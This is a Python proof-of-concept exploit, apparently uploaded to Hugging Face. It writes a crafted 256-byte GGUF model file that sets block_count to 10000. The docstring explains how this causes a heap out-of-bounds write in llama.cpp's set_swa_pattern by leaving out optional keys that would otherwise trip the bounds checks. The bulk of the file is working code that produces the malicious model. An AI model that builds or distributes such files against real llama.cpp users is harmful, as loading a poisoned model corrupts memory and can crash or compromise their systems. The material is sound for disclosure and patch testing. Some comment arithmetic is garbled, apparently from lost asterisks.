llama-cpp-nlayer-oob-poc / poc_nlayer_oob.py

Upload poc_nlayer_oob.py with huggingface_hub

777a5ab verified 2 months ago

7.28 kB

	#!/usr/bin/env python3
	"""
	PoC: Heap OOB write in llama.cpp via unvalidated n_layer (block_count) parameter.

	Vulnerability:
	In src/llama-model.cpp line 520, hparams.n_layer is read from the GGUF file:
	ml.get_key(LLM_KV_BLOCK_COUNT, hparams.n_layer);

	There is NO upper bound check against LLAMA_MAX_LAYERS (512).

	However, the hparams arrays that are indexed by layer number are all
	std::array<..., LLAMA_MAX_LAYERS> where LLAMA_MAX_LAYERS = 512:
	std::array<uint32_t, 512> swa_layers;
	std::array<bool, 512> recurrent_layer_arr;
	std::array<uint32_t, 512> n_head_arr;
	std::array<uint32_t, 512> n_head_kv_arr;
	std::array<uint32_t, 512> n_ff_arr;

	Note: n_expert IS checked (line 537: GGML_ASSERT(hparams.n_expert <= LLAMA_MAX_EXPERTS)),
	proving the developers intended bounds checks but missed n_layer.

	Exploitation path (gemma2 architecture):
	In the LLM_ARCH_GEMMA2 case (line 1323), set_swa_pattern(2) is called
	at line 1327 BEFORE any other key reads.

	set_swa_pattern() in llama-hparams.cpp does:
	for (uint32_t il = 0; il < n_layer; ++il) {
	swa_layers[il] = ...;
	}

	When n_layer = 10000, this writes 9488 uint32_t values (9488 * 4 = 37952 bytes)
	past the end of the swa_layers[512] array on the heap, corrupting through
	the rest of hparams and past the end of the llama_model allocation.

	The common-path get_key_or_arr() calls for n_ff_arr and n_head_arr at
	lines 570-576 DO have an n > N_MAX check, but only AFTER checking if the
	key exists. Since these keys are optional (required=false), omitting them
	from the GGUF file causes an early return before the bounds check, allowing
	execution to reach the arch-specific switch case.

	Attack:
	- GGUF v3 file with architecture = "gemma2"
	- block_count = 10000 (way above 512 limit)
	- Minimal required keys: context_length, embedding_length, block_count
	- The OOB write corrupts heap memory past the llama_model allocation

	Confirmed results:
	- ASan build: heap-buffer-overflow detected at llama-hparams.cpp:15
	in llama_hparams::set_swa_pattern(), WRITE of size 4
	- Regular build: SIGSEGV (exit code 139) due to heap corruption
	- Only 256-byte GGUF file needed (zero tensors, minimal KV pairs)
	"""

	import struct
	import os

	# GGUF constants
	GGUF_MAGIC = b"GGUF"
	GGUF_VERSION = 3

	# GGUF KV types
	GGUF_TYPE_UINT32 = 4
	GGUF_TYPE_FLOAT32 = 6
	GGUF_TYPE_STRING = 8

	# Malicious n_layer value (must be > 512 = LLAMA_MAX_LAYERS)
	# Using 10000 to write 100004=40000 bytes into a 5124=2048 byte array,
	# overflowing by ~38KB which is enough to go past the entire llama_model
	# heap allocation and trigger ASan detection.
	MALICIOUS_N_LAYER = 10000


	def write_string(f, s):
	"""Write a GGUF string: uint64 length + chars (no null terminator)."""
	encoded = s.encode('utf-8')
	f.write(struct.pack('<Q', len(encoded)))
	f.write(encoded)


	def write_kv_string(f, key, value):
	"""Write a KV pair with string value."""
	write_string(f, key)
	f.write(struct.pack('<I', GGUF_TYPE_STRING))
	write_string(f, value)


	def write_kv_uint32(f, key, value):
	"""Write a KV pair with uint32 value."""
	write_string(f, key)
	f.write(struct.pack('<I', GGUF_TYPE_UINT32))
	f.write(struct.pack('<I', value))


	def write_kv_float32(f, key, value):
	"""Write a KV pair with float32 value."""
	write_string(f, key)
	f.write(struct.pack('<I', GGUF_TYPE_FLOAT32))
	f.write(struct.pack('<f', value))


	def create_nlayer_oob_gguf(output_path):
	"""Create a GGUF file that triggers heap OOB write via n_layer > 512."""

	# Architecture string used as prefix for keys: "gemma2"
	arch = "gemma2"

	# KV pairs we need to provide:
	# 1. general.architecture = "gemma2" (required for arch detection)
	# 2. gemma2.context_length = 8192 (required, line 517)
	# 3. gemma2.embedding_length = 256 (required, line 518)
	# 4. gemma2.block_count = 10000 (required, line 520 -- THE TRIGGER)
	# 5. gemma2.attention.layer_norm_rms_epsilon (required in gemma2 case, line 1334)
	# BUT set_swa_pattern is called at line 1327 BEFORE this key is read,
	# so the OOB write happens regardless. We include it to avoid a throw
	# that might confuse the output -- but it's not needed for the OOB.
	#
	# Keys we intentionally OMIT:
	# - gemma2.feed_forward_length (optional, would trigger n>N_MAX check)
	# - gemma2.attention.head_count (optional, would trigger n>N_MAX check)
	# - gemma2.attention.head_count_kv (optional)

	kv_pairs = [
	("string", "general.architecture", arch),
	("uint32", f"{arch}.context_length", 8192),
	("uint32", f"{arch}.embedding_length", 256),
	("uint32", f"{arch}.block_count", MALICIOUS_N_LAYER),
	("float32", f"{arch}.attention.layer_norm_rms_epsilon", 1e-6),
	]

	n_kv = len(kv_pairs)
	n_tensors = 0 # no tensors needed; the OOB happens during hparams loading

	with open(output_path, 'wb') as f:
	# ===== GGUF Header =====
	f.write(GGUF_MAGIC) # magic: "GGUF"
	f.write(struct.pack('<I', GGUF_VERSION)) # version: 3
	f.write(struct.pack('<Q', n_tensors)) # n_tensors: 0
	f.write(struct.pack('<Q', n_kv)) # n_kv

	# ===== KV Pairs =====
	for kv_type, key, value in kv_pairs:
	if kv_type == "string":
	write_kv_string(f, key, value)
	elif kv_type == "uint32":
	write_kv_uint32(f, key, value)
	elif kv_type == "float32":
	write_kv_float32(f, key, value)

	# ===== Alignment padding =====
	# GGUF requires data section to be aligned to 32 bytes.
	# Even with 0 tensors, write padding for format compliance.
	current_pos = f.tell()
	alignment = 32
	padding_needed = (alignment - (current_pos % alignment)) % alignment
	f.write(b'\x00' * padding_needed)

	file_size = os.path.getsize(output_path)
	print(f"[*] Created: {output_path}")
	print(f"[*] File size: {file_size} bytes")
	print(f"[*] Architecture: {arch}")
	print(f"[*] block_count (n_layer): {MALICIOUS_N_LAYER} (LLAMA_MAX_LAYERS = 512)")
	print(f"[*]")
	print(f"[*] Vulnerability: set_swa_pattern() at llama-model.cpp:1327 writes")
	print(f"[*] swa_layers[il] for il = 0..{MALICIOUS_N_LAYER-1}")
	print(f"[*] but swa_layers is std::array<uint32_t, 512>")
	print(f"[] => {MALICIOUS_N_LAYER - 512} OOB writes = {(MALICIOUS_N_LAYER - 512) 4} bytes past end")
	print(f"[*]")
	print(f"[*] Test with:")
	print(f"[*] ./build/bin/llama-cli -m {output_path} -p 'hello'")
	print(f"[*]")
	print(f"[*] Test with ASan build:")
	print(f"[*] ./build-asan/bin/llama-cli -m {output_path} -p 'hello'")
	print(f"[*]")
	print(f"[*] Expected: heap-buffer-overflow or crash")


	if __name__ == "__main__":
	os.makedirs(os.path.dirname(os.path.abspath(__file__)), exist_ok=True)
	output_path = "/Users/eltarne/Documents/script/gguf_poc/poc_nlayer_oob.gguf"
	create_nlayer_oob_gguf(output_path)